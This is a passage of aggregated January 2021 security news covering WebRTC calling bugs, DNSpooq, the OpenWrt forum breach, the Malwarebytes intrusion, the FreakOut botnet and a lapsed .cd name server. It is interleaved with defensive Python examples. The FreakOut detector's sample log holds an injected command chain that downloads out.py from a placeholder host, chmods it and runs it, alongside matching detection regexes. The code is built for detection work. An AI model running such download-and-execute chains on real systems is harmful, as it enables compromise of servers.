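The bug class Silvanovich describes is a callee-side state machine that lets the transport coming up, or a caller-driven "connected" message, switch on media before the user has answered. The following is an added example, not code from Project Zero or from any of the apps named, that models a callee's call state in Python with the media gate derived either from transport readiness alone (the vulnerable shape) or from transport readiness combined with explicit user consent (the hardened shape). The event names and the class are assumptions of the example, not any app's API; the real WebRTC track and signalling calls are left out.

```python
from enum import Enum, auto


class State(Enum):
    IDLE = auto()
    RINGING = auto()      # offer received, user has not answered
    ACCEPTED = auto()     # user answered, transport not yet up
    CONNECTED = auto()    # both conditions met: media may flow
    ENDED = auto()


# Signalling events as seen by the callee (names assumed for the example).
OFFER = "offer_received"
ACCEPT = "user_accept"
TRANSPORT_UP = "transport_connected"
HANGUP = "hangup"


class CalleeCall:
    """Callee-side call state.

    With require_consent=True (hardened) local audio/video are attached only
    when the user accepted AND the transport is up. With require_consent=False
    the transport alone enables media, which is the shape of the bugs above.
    """

    def __init__(self, require_consent=True):
        self.require_consent = require_consent
        self.state = State.IDLE
        self.transport_ready = False
        self.consent_given = False
        self.rejected = []   # events refused in the state they arrived in

    @property
    def media_enabled(self):
        """Whether local tracks are attached to the peer connection."""
        if self.state == State.ENDED or not self.transport_ready:
            return False
        return self.consent_given or not self.require_consent

    def on_event(self, event):
        if event == OFFER and self.state == State.IDLE:
            # Hardened apps also hold back the SDP answer and ICE candidates
            # until ACCEPT, so there is nothing for the transport to connect to.
            self.state = State.RINGING
        elif event == ACCEPT and self.state == State.RINGING:
            self.consent_given = True
            self.state = State.CONNECTED if self.transport_ready else State.ACCEPTED
        elif event == TRANSPORT_UP and self.state in (State.RINGING, State.ACCEPTED):
            self.transport_ready = True
            if self.state == State.ACCEPTED or not self.require_consent:
                self.state = State.CONNECTED
        elif event == HANGUP and self.state != State.IDLE:
            self.state = State.ENDED
        else:
            # Refuse rather than guess: an out-of-order message from the peer
            # must never be able to advance the state on the user's behalf.
            self.rejected.append(event)
        return self.state


def run_call(events, require_consent=True):
    """Feed a signalling sequence; return (final_state, media_enabled, rejected)."""
    call = CalleeCall(require_consent)
    for ev in events:
        call.on_event(ev)
    return call.state, call.media_enabled, list(call.rejected)
```

The test to write for a real client is the same as the vulnerable sequence here: deliver an offer, bring the transport up without ever pressing answer, and assert that no local track is attached and no media leaves the device.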
Human Component: ‘Developer Misunderstanding’
“How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences,” she wrote.
The bugs that she investigated, then, were not the result of “developer misunderstanding of WebRTC features,” Silvanovich said. They were state-machine implementation errors, plain and simple, she said.
“That said, a lack of awareness of these types of issues was likely a factor,” she wrote. “It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.”
Two messaging apps that Silvanovich examined that did not appear to have any problems with state machines and thus likely do not allow for third-party interception of audio or video were Telegram and Viber, she said.
Telegram seemed to be bug-free “largely because the application does not exchange the offer, answer or candidates until the callee has answered the call,” Silvanovich wrote. However, challenges in reverse-engineering Viber made her analysis “less rigorous” than her examination of the other messaging apps, she acknowledged.
DNSpooq Flaws Allow DNS Hijacking of Millions of Devices
20.1.2021 Hacking Threatpost
Seven flaws in open-source software Dnsmasq could allow DNS cache poisoning attacks and remote code execution.
Researchers have uncovered a set of flaws in dnsmasq, popular open-source software used for caching Domain Name System (DNS) responses for home and commercial routers and servers.
The set of seven flaws comprises buffer-overflow issues and flaws that allow DNS cache-poisoning attacks (also known as DNS spoofing). If exploited, these flaws could be chained together to allow remote code execution, denial of service and other attacks.
Researchers have labeled the set of vulnerabilities “DNSpooq,” a combination of DNS spoofing, the concept of “a spook spying on internet traffic,” and the “q” at the end of dnsmasq.
“DNSpooq is a series of vulnerabilities found in the ubiquitous open-source software dnsmasq, demonstrating that DNS is still insecure, 13 years after the last major attack was described,” said researchers with the JSOF research lab, in a recent analysis.
Dnsmasq is installed on many home and commercial routers and on servers in many organizations. By caching responses to previous DNS queries locally, the software speeds up DNS resolution; it has many other uses as well, including providing DNS services to support Wi-Fi hot-spots, enterprise guest networks, virtualization and ad blocking.
Researchers have identified at least 40 vendors who utilize dnsmasq in their products, including Cisco routers, Android phones, Aruba devices, Technicolor and Red Hat, as well as Siemens, Ubiquiti networks, Comcast and many others. In all, “millions” of devices are affected, they said.
DNS Cache Poisoning
Three of the flaws (CVE-2020-25686, CVE-2020-25684 and CVE-2020-25685) could enable DNS cache poisoning.
DNS cache poisoning is a type of attack that enables DNS queries to be subverted. In a real-world situation, an attacker could use unsolicited DNS responses to poison the DNS cache, sending unsuspecting users to a specially crafted, attacker-owned website or redirecting them to malicious servers.
This could potentially lead to fraud and various other malicious attacks, if victims believe they are browsing to one website but are actually routed to another, said researchers. Other attacks could include phishing attacks or malware distribution.
“Traffic that might be subverted includes regular Internet browsing as well as other types of traffic, such as emails, SSH, remote desktop, RDP video and voice calls, software updates and so on,” said researchers.
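What makes an unsolicited response land in a cache is a forwarder that binds a reply to its outstanding query too loosely. The following is an added example, not dnsmasq's code and not derived from the DNSpooq advisory, of the acceptance checks a forwarder should apply to every reply: the reply must come from the upstream address and port the query went to, carry the same 16-bit transaction ID, echo the question section exactly, and contain only records inside the zone the forwarder asked about (the bailiwick rule). The upstream address, query name and zone are constructed for the example; build_response exists only to produce test vectors.

```python
import secrets
import struct

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name):
    """Wire-format a dotted name without compression."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg, off):
    """Read a possibly compressed name at `off`; return (name, offset_after)."""
    labels, end, hops = [], None, 0
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                      # compression pointer (RFC 1035 4.1.4)
            hops += 1
            if hops > 16:
                raise ValueError("pointer loop")
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if end is None:
                end = off + 2
            off = ptr
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels).lower(), (end if end is not None else off)


class PendingQuery:
    """What a forwarder remembers about a query it sent upstream."""

    def __init__(self, name, upstream, bailiwick, qtype=QTYPE_A):
        self.name = name.lower()
        self.qtype = qtype
        self.upstream = upstream              # (ip, port) the query was sent to
        self.bailiwick = bailiwick.lower()    # zone whose records we will accept
        self.txid = secrets.randbelow(65536)  # fresh random ID per query
        self.wire = struct.pack("!HHHHHH", self.txid, 0x0100, 1, 0, 0, 0) \
            + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def validate_response(pending, src, data):
    """Accept a reply only if every binding to the pending query checks out."""
    reasons = []
    if src != pending.upstream:
        reasons.append("source address/port does not match upstream")
    if len(data) < 12:
        return False, reasons + ["truncated header"]
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if txid != pending.txid:
        reasons.append("transaction id mismatch")
    if not flags & 0x8000:
        reasons.append("QR bit not set (not a response)")
    if qd != 1:
        return False, reasons + ["unexpected question count"]
    try:
        qname, off = decode_name(data, 12)
        qtype, qclass = struct.unpack("!HH", data[off:off + 4])
        off += 4
        if (qname, qtype, qclass) != (pending.name, pending.qtype, QCLASS_IN):
            reasons.append("question section does not match query")
        for _ in range(an):
            aname, off = decode_name(data, off)
            _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10 + rdlen
            if aname != pending.bailiwick and not aname.endswith("." + pending.bailiwick):
                reasons.append("out-of-bailiwick answer for " + aname)
    except (IndexError, struct.error, UnicodeDecodeError, ValueError):
        reasons.append("malformed response")
    return not reasons, reasons


def build_response(pending, answers, txid=None, flags=0x8180):
    """Constructed test vector: a reply to `pending` carrying A records."""
    txid = pending.txid if txid is None else txid
    out = struct.pack("!HHHHHH", txid, flags, 1, len(answers), 0, 0)
    out += encode_name(pending.name) + struct.pack("!HH", pending.qtype, QCLASS_IN)
    for aname, ip in answers:
        # point back at the question name when it is the same, else spell it out
        out += b"\xC0\x0C" if aname.lower() == pending.name else encode_name(aname)
        out += struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 300, 4) + bytes(int(o) for o in ip.split("."))
    return out
```

Two of these bindings depend on entropy the forwarder controls, the transaction ID and the source port, so each query needs a fresh random value for both; the question and bailiwick checks cost nothing and remove whole classes of injected records regardless of how the ID was guessed.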
Buffer Overflow
Researchers also shed light on four buffer-overflow vulnerabilities (CVE-2020-25687, CVE-2020-25683, CVE-2020-25682 and CVE-2020-25681) in dnsmasq. The memory-corruption flaws can be triggered by a remote attacker using crafted DNS responses. The attack can lead to denial of service, information exposure and potentially remote code execution.
While the majority of these flaws are heap-based buffer-overflow issues that could lead to denial of service, one of the flaws is a high-severity issue that could potentially enable remote code execution when dnsmasq is configured to use domain name system security extensions (DNSSEC), a set of protocols that add a layer of security to the domain name system.
“For the buffer overflows and remote-code execution, devices that don’t use the DNSSEC feature will be immune,” said researchers. “DNSSEC is a security feature meant to prevent cache poisoning attacks and so we would not recommend turning it off, but rather updating to the newest version of dnsmasq.”
Researchers said that the approximately 1 million dnsmasq servers openly visible on the internet (according to Shodan) make attacks launched via the internet “very simple,” and that there are several real-world scenarios that set up an attacker to exploit these flaws.
“This may be possible in some cases, (we believe rare), even if the forwarder is not open to the internet,” they said.
Also, if a dnsmasq server is only configured to listen to connections received from within an internal network – and an attacker gains a foothold on any device in that network – they would be able to perform the attack. Or, if a dnsmasq server is only configured to listen to connections received from within an internal network but the network is open (including an airport network or a corporate guest network) an attacker could perform the attack.
The Impact
The flaws have varying severity, with CVE-2020-25681 and CVE-2020-25682 being high severity. However, researchers said if these vulnerabilities were chained together they could lead to an array of multi-stage attacks.
“This is because exploiting some of the vulnerabilities makes it easier to exploit others,” said researchers. “For example, we found that combining CVE-2020-25682, CVE-2020-25684, and CVE-2020-25685 would result in CVE-2020-25682 having a lower attack complexity (with the same impact) and result in a combined CVSS of 9.8 according to our analysis.”
Researchers disclosed the flaws in August and publicly revealed them this month. These vulnerabilities are addressed in dnsmasq 2.83; users of internet-of-things (IoT) and embedded devices that use dnsmasq should contact their vendors for further information regarding updates.
“With the help of CERT/CC and volunteers from several companies, a working group was formed, combining the expertise and extended reach of members from JSOF, CERT/CC, Cisco, Google, Red Hat, Pi-hole and Simon Kelley, the maintainer of dnsmasq, to ensure that the DNSpooq vulnerabilities would be effectively fixed and well documented and communicated,” said researchers.
Attackers Steal E-Mails, Info from OpenWrt Forum
20.1.2021 Hacking Threatpost
Users of the Linux-based open-source firmware, which include developers from commercial router companies, may be targeted by phishing campaigns, administrators warn.
The forum supporting the community for OpenWrt suffered a security breach over the weekend, giving hackers access to e-mail addresses, user handles and additional private forum user information.
Those that maintain the forum for the Linux-based open-source firmware said the forum was breached in the early hours of Saturday Jan. 16, though how attackers got in remains unknown, according to a security notice posted to the forum’s home page. While the account had “a good password,” administrators acknowledged that the forum did not enable two-factor authentication for its users.
While the breach of an open-source forum may not seem on the surface like such a big deal, the forum is often visited by those developing commercial routers, devices and software based on OpenWrt firmware. Targeting these users, then, could be used as a gateway into these companies’ networks by threat actors. Commercial routers compatible with OpenWrt firmware include devices from Netgear, Zyxel, TP-Link and Linksys.
“The intruder was able to download a copy of the user list that contains email addresses, handles, and other statistical information about the users of the forum,” according to the notice, which also was sent out via a mailing list to forum users. This means that users should assume that their email address and handle have been disclosed and “may get phishing emails that include your name,” administrators said.
The OpenWrt Project is a Linux operating system for embedded devices that provides “a fully writable filesystem with package management,” according to its home page. Its basic components are Linux, util-linux, musl and BusyBox, all of which have been designed specifically to suit the memory and storage available on home networking devices.
OpenWrt provides a framework to build an application without having to develop a complete firmware around it, so users can provide customization for devices in ways that proprietary systems don’t offer, according to its administrators. Developers cite real-time network management, increased network stability, advanced wireless set-up, VPN integration, and increased network speed and security as some of the benefits of using OpenWrt.
Though those that maintain the forum do not believe that attackers accessed the OpenWrt database, they advised users of the community to reset all passwords, providing specific details in the security notice for the proper procedure to do so. They also have flushed API keys from the forum, according to the notice.
Administrators also advised users to reset and refresh any Github login or OAuth key, if they use it to access the forum. However, since OpenWrt forum credentials are entirely independent of the OpenWrt Wiki that users access for information and updates about the platform, “there is no reason to believe there has been any compromise to the Wiki credentials,” administrators said.
“We apologize for the inconvenience caused by this attack,” they said in the notice. “We will provide updates if we learn any more about the attacker or information that was disclosed.”
Malwarebytes's email systems hacked by SolarWinds attackers
20.1.2021 Hacking Securityaffairs
Cyber security firm Malwarebytes announced that the threat actor behind the SolarWinds attack also breached its network last year.
Malwarebytes revealed today that the SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes joins the club of security firms that were hit by the SolarWinds attackers, after FireEye, Microsoft, and CrowdStrike.
The intrusion took place last year; the company pointed out that the hackers used a different attack vector and did not rely on the SolarWinds Orion software.
The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.
“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments.” reads the post published by Malwarebytes. “After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.”
On December 15, Microsoft Security Response Center warned the security firm of suspicious activity from a third-party application in its Microsoft Office 365 tenant. The activity was consistent with the tactics, techniques, and procedures (TTPs) of the SolarWinds attackers.
Malwarebytes said it learned of the intrusion from the Microsoft Security Response Center (MSRC) on December 15.
With the support of Microsoft’s Detection and Response Team (DART), Malwarebytes discovered that the attackers leveraged a dormant email protection product within its Office 365 tenant that allowed access to a limited subset of internal company emails. The security firm explained that it does not use Azure cloud services in its production environments.
Malwarebytes performed a deep investigation of its infrastructure, inspecting its source code and its build and delivery processes, and confirmed that its internal systems showed no evidence of unauthorized access or compromise. This means that customers using its anti-malware solution were not impacted.
“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.
“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”
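The intrusion vector described above, an admin-consented application with privileged access to Office 365 mail that nobody was watching, is something a tenant administrator can check for. The following is an added example written for this page, not code from Malwarebytes or Microsoft: it reviews a constructed export of application permission grants and flags apps that hold tenant-wide mail permissions while being dormant or coming from an unverified publisher. The permission names Mail.Read, Mail.ReadWrite and full_access_as_app are real Microsoft Graph and Exchange Web Services names; the app names, publishers and dates are invented.

```python
"""Flag dormant or unverified third-party apps that hold privileged mail
permissions in a Microsoft 365 tenant.

Added example, not code from Malwarebytes or Microsoft.  The records mimic the
fields an administrator can export for admin-consented application
permissions (app name, publisher, granted application permissions, last
sign-in); the sample tenant below is constructed for illustration.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional, Set

# Application-level permissions that expose mailbox content tenant-wide.
# Mail.Read / Mail.ReadWrite are Microsoft Graph permission names;
# full_access_as_app is the Exchange Web Services name.
PRIVILEGED_MAIL_SCOPES = {"Mail.Read", "Mail.ReadWrite", "full_access_as_app"}


@dataclass
class AppGrant:
    display_name: str
    publisher: str                 # empty string when the publisher is unverified
    app_permissions: Set[str]      # admin-consented application permissions
    last_sign_in: Optional[date]   # None when the app never authenticated


def is_dormant(grant, today, idle_days=90):
    """An app that has not signed in for idle_days (or ever) is dormant."""
    if grant.last_sign_in is None:
        return True
    return (today - grant.last_sign_in) > timedelta(days=idle_days)


def risky_grants(grants, today, idle_days=90):
    """Return (app name, privileged mail scopes, reasons) for every app that
    holds privileged mail access and is dormant or from an unverified publisher."""
    findings = []
    for g in grants:
        mail = g.app_permissions & PRIVILEGED_MAIL_SCOPES
        if not mail:
            continue
        reasons = []
        if is_dormant(g, today, idle_days):
            reasons.append("dormant")
        if not g.publisher:
            reasons.append("unverified publisher")
        if reasons:
            findings.append((g.display_name, sorted(mail), reasons))
    return findings


# Constructed sample export; names and dates are invented.
TODAY = date(2021, 1, 20)
SAMPLE_GRANTS = [
    AppGrant("Legacy Mail Protection Connector", "Example Security Vendor",
             {"Mail.Read", "full_access_as_app"}, date(2019, 8, 2)),
    AppGrant("HR Calendar Sync", "Example HR Inc", {"Calendars.Read"}, date(2021, 1, 18)),
    AppGrant("Ticketing Mail Ingest", "", {"Mail.ReadWrite"}, date(2021, 1, 19)),
    AppGrant("Archive Exporter", "Example Archiving Ltd", {"Mail.Read"}, None),
]

if __name__ == "__main__":
    for name, scopes, reasons in risky_grants(SAMPLE_GRANTS, TODAY):
        print(f"{name}: {', '.join(scopes)} -> {', '.join(reasons)}")
```

The check deliberately keys on application (not delegated) permissions: those act without any user signing in, which is exactly what makes a forgotten connector an attractive foothold. A real run would feed it the tenant's service principal and sign-in data rather than the constructed list.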
FreakOut botnet targets 3 recent flaws to compromise Linux devices
20.1.2021 Hacking Securityaffairs
Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities.
Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.
The botnet appeared in the threat landscape in November 2020; in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aim at compromising the targeted systems to build an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaigns.
The attacks observed by Check Point aimed at devices that run one of the following products:
TerraMaster TOS(TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers
Zend Framework – a collection of packages used in building web applications and services using PHP, with more than 570 million installations
Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites
Once a device is infected, it is later used as an attack platform.
FreakOut botnet
Botnet operators scan the internet for vulnerable applications affected by one of the recently disclosed vulnerabilities in order to take over the underlying Linux system:
CVE-2020-28188 – RCE flaw that resides in the TerraMaster management panel (disclosed on December 24, 2020) – This flaw could be exploited by a remote unauthenticated attacker to inject OS commands, and gain control of the servers using TerraMaster TOS (versions prior to 4.2.06).
CVE-2021-3007 – deserialization flaw that affects the Zend Framework (disclosed on January 3, 2021). The flaw affects Zend Framework versions higher than 3.0.0. The attacker can abuse the Zend3 feature that loads classes from objects to upload and execute malicious code on the server. The code can be uploaded using the “callback” parameter, which in this case inserts malicious code instead of the “callbackOptions” array.
CVE-2020-7961 – Java unmarshalling flaw via JSONWS in Liferay Portal (in versions prior to 7.2.1 CE GA2) (disclosed on March 20, 2020). An attacker can exploit the flaw to provide a malicious object, that when unmarshalled, allows remote code execution.
“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”
The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.
The FreakOut botnet has a modular structure, it uses a specific function for each capability it supports. Below a list of functions implemented in the botnet:
Port Scanning utility
Collecting system fingerprint
Includes the device address (MAC, IP), and memory information. These are used in different functions of the code for different checks
TerraMaster TOS version of the system
Creating and sending packets
ARP poisoning for Man-in-the-Middle attacks.
Supports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP
Protocol packing support created by the attacker.
Brute Force – using hard coded credentials
With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries to brute force each IP with the given credential. If it succeeds, the results of the correct credential are saved to a file, and sent in a message to the C2 server
Handling sockets
Includes handling exceptions of runtime errors.
Supports multi-threaded communication to other devices. This allows simultaneous actions the bots can perform while listening to the server
Sniffing the network
Executes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices. The intercepted data is sent to the C2 server
Spreading to different devices, using the “exploit” function.
Randomly generates the IPs to attack
Exploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)
Gaining persistence by adding itself to the rc.local configuration.
DDOS and Flooding – HTTP, DNS, SYN
Self-implementation of Slowlaris. The malware creates many sockets to a relevant victim address for the purpose of instigating a DDoS attack
Opening a reverse-shell – shell on the client
Killing a process by name or ID
Packing and unpacking the code using obfuscation techniques to provide random names to the different functions and variables.
The botnet could conduct multiple malicious activities by combining the above functions, such as delivering cryptocurrency miners, launching DDoS attacks, or spreading laterally across the company network.
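The write-up gives defenders two concrete things to look for: the initial request chain (an injected OS command that downloads out.py, chmods it and runs it with python2, served from gxbrowser[.]net) and the rc.local persistence. The following is an added example for this page, not code from Check Point or from the botnet, that checks both in constructed data: it scans common-log-format web access lines for a request carrying that chain and audits an rc.local file for an interpreter launched on a script in a world-writable path. The request path /cgi-bin/status, the parameter name, the host example.invalid and the log and rc.local content are all constructed; the only page-derived values are the out.py stages and the hosting domain.

```python
"""Look for the FreakOut attack chain described above in web-server access
logs and for its rc.local persistence on a host.

Added example, not code from Check Point or the botnet's author.  It matches
only the behaviour the write-up names: a request carrying chained shell
commands that fetch a script called out.py, chmod it and run it with python2
(or that reference the hosting domain gxbrowser[.]net), plus an rc.local line
that starts an interpreter on a script in a world-writable path.  The log
lines, request path and rc.local content are constructed samples.
"""
import re
from urllib.parse import unquote

# Indicators from the write-up: the out.py stages and the download host.
HOSTING_DOMAIN = "gxbrowser.net"
STAGE_PATTERNS = {
    "download-out.py": re.compile(r"\b(?:wget|curl)\b[^;|&]*out\.py", re.I),
    "chmod-out.py": re.compile(r"\bchmod\b[^;|&]*out\.py", re.I),
    "python2-out.py": re.compile(r"\bpython2(?:\.\d+)?\b[^;|&]*out\.py", re.I),
}
# Shell metacharacters that let an injected string chain commands.
CHAIN_RE = re.compile(r"[;|&]|\$\(|`")
# Common-log-format line: client, ident, user, timestamp, request, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def score_request(raw_request):
    """Return the indicator names found in one request line, after URL-decoding."""
    req = unquote(raw_request)
    hits = []
    if CHAIN_RE.search(req):
        hits.append("command-chain")
    for name, rx in STAGE_PATTERNS.items():
        if rx.search(req):
            hits.append(name)
    if HOSTING_DOMAIN in req.lower():
        hits.append("known-host")
    return hits


def scan_access_log(lines):
    """Return (ip, request, hits) for lines showing command chaining plus at
    least one other indicator; a lone ';' in a query string is not enough."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = score_request(m.group("req"))
        if "command-chain" in hits and len(hits) >= 2:
            findings.append((m.group("ip"), m.group("req"), hits))
    return findings


def rc_local_suspects(rc_local_text):
    """Return rc.local lines that launch an interpreter on a script under /tmp,
    /var/tmp or /dev/shm, which is where a dropped bot usually lives."""
    suspects = []
    for line in rc_local_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or s == "exit 0":
            continue
        if re.search(r"\b(?:python2?|python3|sh|bash|perl)\b.*(?:/tmp/|/var/tmp/|/dev/shm/)", s):
            suspects.append(s)
    return suspects


# Constructed samples: one benign GET, one benign POST, one injection attempt
# whose parameter carries the chain described in the write-up.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jan/2021:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200',
    '198.51.100.7 - - [20/Jan/2021:10:01:09 +0000] "POST /api/login HTTP/1.1" 200',
    '192.0.2.44 - - [20/Jan/2021:10:02:31 +0000] "GET /cgi-bin/status?opt=x%3Bwget%20http%3A%2F%2Fexample.invalid%2Fout.py%3Bchmod%20%2Bx%20out.py%3Bpython2%20out.py HTTP/1.1" 500',
]
SAMPLE_RC_LOCAL = """#!/bin/sh -e
# rc.local: executed at the end of each multiuser runlevel
/usr/sbin/ntpdate -u pool.ntp.org
python2 /tmp/.x/out.py &
exit 0
"""

if __name__ == "__main__":
    for ip, req, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits)
    print(rc_local_suspects(SAMPLE_RC_LOCAL))
```

Requiring the chaining metacharacter plus at least one out.py or host indicator keeps ordinary query strings out of the results; the rc.local check is intentionally narrow and should be paired with a review of cron, systemd units and the other persistence locations the bot could use.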
Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.
The botnet is at an early stage: at the time of the analysis, the IRC panel showed it was controlling only 188 bots.
Check Point experts were also able to track its author, who goes by the moniker Freak.
“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media. Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.
“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”
The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).
OpenWRT forum hacked, intruders stole user data
19.1.2021 Hacking Securityaffairs
The OpenWRT forum, the community behind the open-source project for embedded operating systems based on Linux, disclosed a data breach.
OpenWrt is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic. The main components are Linux, util-linux, musl, and BusyBox. All components have been optimized to be small enough to fit into the limited storage and memory available in home routers.
The OpenWRT forum was compromised over the weekend and user data was stolen by the intruders.
The administrators of the forum disclosed the data breach with an announcement published on the forum.
The attack took place on Saturday, around 04:00 (GMT), when threat actors compromised an administrator account and downloaded a copy of the list of users.
“Around 0400 GMT on 16 Jan 2021, an administrator account on the OpenWrt forum (https://forum.openwrt.org) was breached. It is not known how the account was accessed: the account had a good password, but did not have two-factor authentication enabled.” states the data breach notification published by the administrators of the forum. “The intruder was able to download a copy of the user list that contains email addresses, handles, and other statistical information about the users of the forum. Although we do not believe the intruder could download the database, from an abundance of caution, we are following the advice of the Discourse community and have reset all passwords on the Forum, and flushed any API keys.”
The list contains email addresses, handles, and other statistical information about the users of the forum. According to the announcement, the compromised account was using “a good password,” but it was not using two-factor authentication (2FA).
Administrators do not believe the attackers have downloaded the database of the forum containing users’ credentials.
However, with an abundance of caution, forum administrators reset all passwords and flushed any API keys.
Users have to reset their password manually on https://forum.openwrt.org by following the “get a new password” instructions. If users sign in with a GitHub login/OAuth key, they should reset or refresh it.
The notice states that OpenWrt forum credentials are separate from OpenWrt Wiki (https://openwrt.org) credentials, which means that the data breach did not compromise Wiki credentials.
OpenWRT administrators warn of phishing attempts against forum users.
“You should assume that your email address and handle have been disclosed. That means you may get phishing emails that include your name. DO NOT click links, but instead manually type the URL of the forum as above.” states the advisory.
Expired Domain Allowed Researcher to Hijack Country's TLD
19.1.2021 Hacking Securityweek
A researcher claimed last week that he managed to take control of the country code top-level domain (ccTLD) for the Democratic Republic of Congo after an important domain name was left to expire.
Before the holidays, Fredrik Almroth, founder and researcher at web security company Detectify, decided to analyze the name server (NS) records used by all TLDs. These NS records specify the servers for a DNS zone.
He noticed that a domain named scpt-network.com, which had been listed as a name server for .cd, the TLD for Congo, had been left to expire. Almroth realized that the domain could be highly valuable to a bad actor so he quickly acquired it himself to prevent abuse.
The remaining name servers managing the .cd TLD belonged to South African Internet eXchange (SAIX), which kept the TLD operational. However, gaining control over the scpt-network.com domain could have still allowed a malicious actor to hijack half of the DNS traffic for .cd websites.
Almroth believes the impact could have been significant considering that the African country has a population of approximately 90 million people, as well as the fact that many international organizations have a .cd website.
The researcher noted that a threat actor could have redirected DNS traffic from legitimate sites to phishing or other malicious websites, they could have passively intercepted DNS traffic for surveillance purposes or data exfiltration, or they could have used it for fast fluxing, to hide malicious websites.
Hackers could have also abused this access for remote code execution on local networks, they could have taken control of the domains of high-profile organizations, or they could have launched DDoS attacks against a specific target. They could have also disrupted much of the TLD, Almroth said.
In a blog post published last week, the researcher provided examples of how some of these attacks could have been carried out.
Almroth has been trying to return scpt-network.com to its rightful owner and, in the meantime, name servers have been replaced with scpt-network.net by the administrators of the TLD, who were notified by the researcher in early January.
“The potential implications for DNS hijacking of a ccTLD are widespread and have extreme negative consequences, especially if the attacker has bad intentions,” Almroth explained in his blog post. “This vulnerability affects more than a single website, subdomain, or even a single apex domain. All .cd websites, including those for major international companies, financial institutions, and other organizations that have a .cd domain in Africa’s second most populous country could have fallen victim to abuse, including phishing, MITM, or DDoS.”
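The check Almroth ran, looking at which domains a TLD's name servers hang off and whether any of them could lapse, is one a zone operator can run on its own delegation. The following is an added example for this page, not code from Detectify or the researcher: it reduces each name-server host to its registrable domain and reports what share of a zone's name servers rests on domains outside the operator's control, so a single third-party domain carrying half the delegation (the situation described for .cd) stands out. The NS hostnames, the operator domain saix.example, the invented "zz." zone and the three-entry public-suffix table are constructed; only scpt-network.com comes from the article.

```python
"""Audit which registrable domains a TLD's delegation depends on.

Added example, not code from Detectify or the researcher.  It reproduces the
kind of check described above: reduce each name-server host of a zone to the
registrable (apex) domain it hangs off, then report the share of the zone's
name servers that rest on each domain, so a third-party domain that could
expire stands out.  The NS data and the small public-suffix table are
constructed samples; a real audit would take NS records from the root zone,
use the full Public Suffix List and check registrar expiry dates.
"""
from collections import defaultdict

# Constructed stand-in for the Public Suffix List: multi-label suffixes only,
# single-label TLDs are covered by the default rule below.
PUBLIC_SUFFIXES = {"co.za", "co.uk", "com.au"}


def registrable_domain(host):
    """Return the apex domain that a name-server hostname depends on."""
    labels = host.rstrip(".").lower().split(".")
    suffix_len = 2 if len(labels) >= 2 and ".".join(labels[-2:]) in PUBLIC_SUFFIXES else 1
    if len(labels) <= suffix_len:
        raise ValueError(f"{host!r} is a public suffix, not a host")
    return ".".join(labels[-(suffix_len + 1):])


def delegation_dependencies(ns_records):
    """Map zone -> {apex domain: share of the zone's name servers under it}."""
    result = {}
    for zone, hosts in ns_records.items():
        counts = defaultdict(int)
        for h in hosts:
            counts[registrable_domain(h)] += 1
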